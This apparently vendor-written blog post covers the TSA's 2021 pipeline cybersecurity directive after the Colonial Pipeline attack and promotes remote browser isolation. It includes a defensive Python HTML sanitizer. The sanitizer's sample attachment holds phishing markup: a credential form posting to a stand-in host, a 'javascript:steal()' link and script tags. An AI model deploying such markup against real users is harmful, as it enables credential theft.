The Transportation Security Administration (TSA), a part of the Department of Homeland Security (DHS), recently announced that it is issuing mandatory cybersecurity requirements for the pipeline sector. The announcement comes in the wake of the Colonial Pipeline ransomware attack, which led the company to shut down its pipeline for 11 days and caused fuel shortages on the East Coast. The company paid a $4 million ransom, but it has been reported that the decryption keys it received did not work well, and that most of the recovery was effected from the company’s own backup systems.
The shutdown highlighted how vulnerable critical infrastructure is to attacks of this kind, and how an attack on a private company can have a major impact on the ability of critical systems to function.
With this new directive, the pipeline sector joins a handful of other industries, including nuclear power plants and bulk electric power, that must comply with mandatory cybersecurity guidelines. An attempt by Congress to extend mandatory cybersecurity guidance to a wider range of critical infrastructure industries failed after the Chamber of Commerce mounted strong opposition to the plan. Given the growing number of attacks on critical infrastructure, it would not be surprising to see additional mandatory requirements imposed on other industries, industry by industry, by the relevant regulatory authorities.
Most people know the TSA from its most public-facing function: airport security. Pipelines are considered a form of transportation because they move goods – typically fuel, gas, or chemicals – from place to place. They were originally regulated by the Department of Transportation, but after the creation of TSA in 2002 pipeline security responsibilities were transferred to the new organization.
One of the biggest challenges in securing America’s critical infrastructure from cyberattacks is that there is no central organization responsible for cybersecurity. Instead, there is a patchwork of regulations, industry by industry. The Energy Department issues cyber regulations for bulk electric providers, while DHS issues rules for chemical plants, and the Nuclear Regulatory Commission (NRC) issues rules for nuclear power. Conceivably a pipeline carrying chemicals could be obligated to follow two completely different sets of cybersecurity rules, one coming from DHS for chemical facilities, and one from TSA for pipeline companies.
New Requirements for Pipeline Companies
On May 28, 2021, TSA issued Security Directive Pipeline-2021-01. See the directive for details; in general, the new regulations include:
- Companies must designate a Cybersecurity Coordinator who is to be available 24×7.
- Cybersecurity incidents must be reported to CISA (Cybersecurity and Infrastructure Security Agency).
- Companies must review their cybersecurity measures and identify any gaps.
- Companies must identify remediation measures to address those cyber-risks.
- Companies must report the results to TSA and CISA within 30 days.
Getting Ahead of the New Rules
Having a coordinator and having procedures in place are important steps toward complying with the regulations, but far more important for your organization’s actual security are the remediation measures you put in place to protect your cyber infrastructure.
Ransomware, as used in the Colonial Pipeline attack, is an increasingly common attack vector against critical infrastructure. With over 90% of ransomware attacks delivered by email or infected websites, one of the most important steps you can take is to protect your organization against them with Remote Browser Isolation (RBI). With RBI, websites are opened in a virtual browser running in an isolated container in the cloud, so no code (good or bad) runs on the user’s device. Only safe rendering data is sent to the user’s regular browser, where they interact with it as they would with the actual website. Ericom’s RBI solution also automatically disinfects email attachments by deactivating any active elements before they are presented to the user, and suspected phishing sites can be opened automatically in “read-only” mode to prevent users from entering credentials.
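To make the two attachment-side behaviours above concrete (deactivating active elements before a document reaches the user, and a “read-only” mode in which forms cannot accept credentials), here is an added example of a minimal content-disarm pass written for this post. It is not Ericom’s code and does not represent how its RBI product is implemented; the tag and attribute lists, the `disarm()` function and the sample attachment are all assumptions constructed for illustration. It strips script-bearing elements and event-handler attributes, rejects `javascript:`/`data:` URLs, and in read-only mode disables every form control and removes form `action` targets, returning an audit list of what was removed.

```python
"""Illustrative content-disarm pass (constructed for this post, not Ericom's
code): strip active content from an HTML attachment and, in read-only mode,
neutralise its forms so a user cannot type credentials into the page."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ACTIVE_ELEMENTS = {"script", "iframe", "frame", "object", "embed", "applet"}  # dropped outright
DROP_CONTENT = {"script", "iframe", "frame", "object", "applet"}              # ...with their contents
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
UNSAFE_SCHEMES = {"javascript", "vbscript", "data"}
FORM_CONTROLS = {"input", "textarea", "select", "button"}


def _unsafe_url(value):
    """True if the URL's scheme could execute or smuggle script once rendered."""
    # Collapse whitespace/control characters so "java\tscript:" is still caught.
    norm = "".join(c for c in value if c.isprintable() and not c.isspace())
    try:
        return urlsplit(norm).scheme.lower() in UNSAFE_SCHEMES
    except ValueError:  # unparsable URL: treat as unsafe
        return True


class Disarmer(HTMLParser):
    def __init__(self, read_only=False):
        super().__init__(convert_charrefs=False)
        self.read_only = read_only
        self.out = []        # rebuilt, sanitised markup
        self.stripped = []   # audit trail of what was removed
        self.skip_depth = 0  # >0 while inside a dropped element's content

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:          # HTMLParser already lower-cases names
            if name.startswith("on"):      # inline event handler
                self.stripped.append(f"{tag}@{name}")
                continue
            if name in URL_ATTRS and value is not None and _unsafe_url(value):
                self.stripped.append(f"{tag}@{name}={value!r}")
                continue
            if self.read_only and tag == "form" and name == "action":
                self.stripped.append("form@action (read-only)")  # form can no longer submit
                continue
            kept.append((name, value))
        if self.read_only and tag in FORM_CONTROLS and all(n != "disabled" for n, _ in kept):
            kept.append(("disabled", None))  # user cannot type into or click it
        return kept

    def _emit_tag(self, tag, attrs, self_closing=False):
        parts = [f'{n}="{escape(v)}"' if v is not None else n for n, v in attrs]
        self.out.append("<" + " ".join([tag, *parts]) + (" />" if self_closing else ">"))

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth += 1   # nested dropped element
            return
        if tag in ACTIVE_ELEMENTS:
            self.stripped.append(tag)
            if tag in DROP_CONTENT:
                self.skip_depth = 1
            return
        self._emit_tag(tag, self._clean_attrs(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        if self.skip_depth:
            return
        if tag in ACTIVE_ELEMENTS:
            self.stripped.append(tag)
            return
        self._emit_tag(tag, self._clean_attrs(tag, attrs), self_closing=True)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth -= 1
            return
        if tag not in ACTIVE_ELEMENTS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self.skip_depth:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self.skip_depth:
            self.out.append(f"&#{name};")

    # Comments and processing instructions are silently dropped: a reader does
    # not need them and they have historically hidden conditional payloads.


def disarm(html, read_only=False):
    """Return (sanitised_html, list_of_removed_items)."""
    p = Disarmer(read_only=read_only)
    p.feed(html)
    p.close()
    return "".join(p.out), p.stripped


# Constructed sample attachment for the demo, not a captured message.
SAMPLE = (
    '<html><body><h1>Invoice</h1><script>alert(1)</script>'
    '<p onclick="x()">Pay <a href="javascript:steal()">here</a> or '
    '<a href="https://example.com/pay">here</a></p>'
    '<form action="https://evil.example/collect"><input name="user">'
    '<input type="password" name="pw"><button>Login</button></form>'
    '<iframe src="https://evil.example"></iframe></body></html>'
)

if __name__ == "__main__":
    cleaned, removed = disarm(SAMPLE, read_only=True)
    print(cleaned)
    print("removed:", removed)
```

The audit list returned alongside the cleaned markup is what a defender would want logged: a document that arrives with event handlers and a `javascript:` link stripped out is itself a signal worth alerting on, independent of whether the user ever opened it.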
RBI is one part of an overall Zero Trust approach to cybersecurity. Zero Trust is the only way to protect against many “zero-day” exploits: it assumes that any user and any traffic, on or off the network, is potentially dangerous, and takes steps to stop or minimize the potential harm.